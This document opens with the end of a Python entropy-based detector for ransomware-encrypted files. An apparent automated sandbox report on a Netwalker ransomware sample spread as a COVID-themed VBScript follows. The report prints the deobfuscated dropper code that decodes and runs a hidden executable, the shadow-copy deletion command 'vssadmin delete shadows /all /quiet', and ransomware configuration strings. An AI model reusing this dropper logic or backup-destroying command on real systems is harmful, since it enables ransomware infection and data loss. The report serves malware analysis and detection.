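            continue
        ext = os.path.splitext(path)[1].lower()
        verdict = "weak" if ext in NATURALLY_DENSE else "strong"
        findings.append((path, round(h, 3), verdict))
    return findings


# Constructed stand-in for an untouched AutoIt include file.
PLAINTEXT_AU3 = (
    "; constructed stand-in for an AutoIt include file\n"
    "#include-once\n"
    "Func _ArrayAdd(ByRef $aArray, $vValue)\n"
    "    If Not IsArray($aArray) Then Return SetError(1, 0, -1)\n"
    "    ReDim $aArray[UBound($aArray) + 1]\n"
    "    $aArray[UBound($aArray) - 1] = $vValue\n"
    "    Return UBound($aArray) - 1\n"
    "EndFunc\n"
).encode() * 40

# Constructed sample set: one untouched source file, one "encrypted" source file
# (random bytes stand in for ciphertext), one SFX stub that is dense regardless.
SAMPLE_FILES = {
    r"C:\Program Files (x86)\AutoIt3\Include\Misc.au3": PLAINTEXT_AU3,
    r"C:\Program Files (x86)\AutoIt3\Include\Array.au3": os.urandom(65536),
    r"C:\Program Files\7-Zip\7z.sfx": os.urandom(65536),
}

if __name__ == "__main__":
    for path, h, verdict in flag_encrypted(SAMPLE_FILES):
        print(f"{h:.3f}  {verdict:6s}  {path}")
```

A file-system sweep built on this should sample a fixed-size window from each file rather than read whole files, and should treat the "strong" verdicts as the alert condition; the "weak" ones only confirm that encryption happened once a strong hit exists in the same directory.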

System Summary:

Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DC10 NtSetInformationFile, | 2_2_0040DC10
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DCD0 NtSetInformationFile, | 2_2_0040DCD0
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040E8B0 NtDuplicateObject,NtClose,NtClose, | 2_2_0040E8B0
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D310 NtQuerySystemInformation, | 2_2_0040D310
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040EBC0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 2_2_0040EBC0
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00407820 | 2_2_00407820
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405A90 | 2_2_00405A90
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405950 | 2_2_00405950
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B560 | 2_2_0040B560
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AF70 | 2_2_0040AF70
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AB00 | 2_2_0040AB00
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B180 | 2_2_0040B180
Java / VBScript file with very long strings (likely obfuscated code)
Source: CORONAVIRUS_COVID-19.vbs | Initial sample: Strings found which are bigger than 50
Binary contains paths to development resources
Source: qeSw.exe, 00000002.00000002.1480282014.000000000252A000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files (x86)\autoit3\AutoItX\Examples\C++\utoItX.sln
Classification label
Source: classification engine | Classification label: mal100.rans.spre.evad.winVBS@6/226@0/0
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D5E0 LookupPrivilegeValueW,AdjustTokenPrivileges, | 2_2_0040D5E0
Creates files inside the program directory
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs'
Queries a list of all open handles
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System information queried: HandleInformation
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11%
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\CORONAVIRUS_COVID-19.vbs'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Creates a directory in C:\Program Files
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Directory created: C:\Program Files\7-Zip\E3495D-Readme.txt
Binary contains paths to debug symbols
Source: Binary string: SecurityHealthAgent.pdbHeal source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscsvc.pdbl source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: shellext.pdbhServic source: qeSw.exe, 00000002.00000002.1483380682.0000000002CCA000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthService.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscIsvIf.pdbityCent source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: shellext.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: WscIsvIf.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthSSO.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityCenterBroker.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityCenterBroker.pdbb. source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthSSO.pdb.pdbc source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscsvc.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp
Source: Binary string: SecurityHealthAgent.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell")Set FSO = CreateObject("Scripting.FileSystemObject")Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Google.url"set oUrlLink = WshShell.CreateShortcut(Path)oUrlLink.TargetPath = "http://google.com"oUrlLink.Save(G)if (FSO.FileExists(Path)) Then WScript.Echo "Error!"elsexml = "Msxml2.DOMDocument"ws = "WScript.Shell"bin = "bin.base64"bs = "base64"db = "Adodb.Stream"Set wshs = createobject(ws)filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\qeSw.exe"end ifFunction a(n) Dim i, j, abcabc = array("!","@","%",".","?","<",">","$","#",",") For i = 0 To 9n = replace(n, abc(i), "")Nexta = replace(n,"*","/")End FunctionSet oXML = CreateObject(xml)Set oNode = oXML.CreateElement(bs)oNode.dataType = binoNode.text = strreverse(a(code))Set BinaryStream = CreateObject(db)BinaryStream.Type = 1BinaryStream.OpenBinaryStream.Write oNode.nodeTypedValueBinaryStream.SaveToFile filepathwshs.Exec(filepath)'WshShell.Popup "This file might not be the right file type, or it might be corrupted!", 20, "Windows", 0 + 48IWshShell3.ExpandEnvironmentStrings("%TEMP%");IWshShell3.CreateShortcut("C:\Users\user\AppData\Local\Temp\Google.url");IWshURLShortcut.TargetPath("http://google.com");IWshURLShortcut.Save("Unsupported parameter type 00000000");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Google.url");IWshShell3.ExpandEnvironmentStrings("%TEMP%");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFEBQjwAAAAAAAAAAOAADwELAQIAADoBAABQAwAAAAAAgDo");_Stream.Type("1");_Stream.Open();IXMLDOMElement.nodeTypedValue();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\qeSw.exe");IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\qeSw.exe")
PE file contains an invalid checksum
Source: qeSw.exe.0.dr | Static PE information: real checksum: 0x4be47 should be: 0x52514
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D7E0 push ecx; mov dword ptr [esp], 00000000h | 2_2_0040D7E1
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_007A57B0 push edx; ret | 2_2_007A593E
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785D51 push es; iretd | 2_2_00785D5D
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078550A push ebp; ret | 2_2_00785538
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078073D push 00000000h; ret | 2_2_00780748
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785F0D push esp; ret | 2_2_00785F13

Persistence and Installation Behavior:

Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM
Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe
Creates license or readme file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\free window registry repair\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\adobe\Acrobat Reader DC\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Extras\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\GUI\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\Office16\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\AutoItX\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\regid.1991-06.com.microsoft\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\Helpfile\E3495D-Readme.txt
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\common files\DESIGNER\E3495D-Readme.txt

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep | graph_2-8408
Found evasive API chain (may stop execution after checking system information)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep | graph_2-7471
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep | graph_2-8231
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe TID: 5724 | Thread sleep time: -300000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW, | 2_2_0040BFC0
Contains functionality to query local drives
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, | 2_2_0040D070
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: *:\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: +~C-{"mpk:"/fqCb2TTvBeb3VoL4lXa1fgDDn+sEO4+mBhIj9vrLEk=","mode:0,"spsz:15360,"thr:1000,"namesz:8,"idsz:6,"lfile:"{id}-Readme.txt,"onion:"rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion,"lend:"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,"white:{"path:["*system volume information,"*windows.old,"*:\users\*\*tempmp","*msocache,"*:\winnt","*$windows.~ws,"*perflogs,"*boot,"*:\windows","*:\program file*\vmwaree","\\*\users\*\*temptemp","\\*\winntnt","\\*\windowsws","*\program file*\vmwaree","*appdata*microsoft,"*appdata*packages,"*microsoft\provisioning","*dvd maker,"*Internet Explorer,"*Mozilla,"*Mozilla*,"*Old Firefox data,"*\program file*\windows media**","*\program file*\windows portable**","*windows defender,"*\program file*\windows ntt","*\program file*\windows photo**","*\program file*\windows side**","*\program file*\windowspowershelll","*\program file*\cuass**","*\program file*\microsoft gamess","*\program file*\common files\systemem","*\program file*\common files\*shareded","*\program file*\common files\reference ass*s*","*\windows\cache**","*temporary internet*,"*media player,"*:\users\*\appdata\*\microsoftsoft","\\*\users\*\appdata\*\microsoftrosoft"],"file:["ntuser.dat*,"iconcache.db,"gdipfont*.dat,"ntuser.ini,"usrclass.dat,"usrclass.dat*,"boot.ini,"bootmgr,"bootnxt,"desktop.ini,"ntuser.dat,"autorun.inf,"ntldr,"thumbs.db,"bootsect.bak,"bootfont.bin],"ext:["msp,"exe,"sys,"msc,"mod,"clb,"mui,"regt
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: ws","*\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: *\program file*\vmware
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: ","*:\program file*\vmware
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information queried: ProcessInformation

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep | graph_2-7471
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00401250 RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll,RtlInitUnicodeString,LdrLoadDll,LdrLoadDll, | 2_2_00401250
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D380 mov eax, dword ptr fs:[00000030h] | 2_2_0040D380
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Memory protected: page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: qeSw.exe.0.dr
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\qeSw.exe C:\Users\user\AppData\Local\Temp\qeSw.exe
May try to detect the Windows Explorer process (often used for injection)
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: qeSw.exe, 00000002.00000002.1477998321.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Malware Configuration

No configs have been found

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

Time | Type | Description
09:00:54 | API Interceptor | 7x Sleep call for process: qeSw.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
CORONAVIRUS_COVID-19.vbs | 12% | Virustotal
CORONAVIRUS_COVID-19.vbs | 2% | Metadefender
CORONAVIRUS_COVID-19.vbs | 10% | ReversingLabs | Script-VBS.Trojan.Malscript

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\qeSw.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qeSw.exe | 72% | Virustotal
C:\Users\user\AppData\Local\Temp\qeSw.exe | 71% | ReversingLabs | Win32.Trojan.Kryptik

Unpacked PE Files

Source | Detection | Scanner | Label
2.1.qeSw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.autoit.de/index.php?page=Thread&postID=48393 | 0% | Virustotal
http://www.autoit.de/index.php?page=Thread&postID=48393 | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0B | 0% | Virustotal
https://sectigo.com/CPS0B | 0% | URL Reputation | safe
http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix | 0% | Virustotal
http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 0% | Virustotal
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 0% | URL Reputation | safe
http://schemas.mpv | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | Virustotal
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | URL Reputation | safe
http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2 | 0% | Virustotal
http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2 | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
Process Memory Space: qeSw.exe PID: 244 | JoeSecurity_Netwalker | Yara detected Netwalker ransomware | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.